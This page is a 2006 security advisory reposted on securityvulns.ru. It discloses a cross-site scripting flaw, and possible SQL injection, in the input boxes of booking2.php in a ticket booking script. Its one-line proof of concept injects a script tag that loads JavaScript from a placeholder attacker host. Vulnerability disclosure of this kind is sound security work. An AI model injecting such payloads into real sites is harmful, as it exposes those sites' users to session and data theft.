Computer Security

Security Advisory: mole.com.ua Ticket Booking Script - XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] ASPListPics

  [Kil13r-SA-20060609-
3] DreamWiz Search Cross-Site Scripting Vulnerability

  [Kil13r-SA-20060609-
2] DaNaWa Search Cross-Site Scripting Vulnerability

  [Kil13r-SA-20060609-
1] Daum Search Cross-Site Scripting Vulnerability

From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date:10.06.2006
Subject:mole.com.ua Ticket Booking Script - XSS

Ticket Booking Script

Homepage:
http://www.mole.com.ua

Effected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it
to a MySQL db. This can causes XSS examples as well as possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru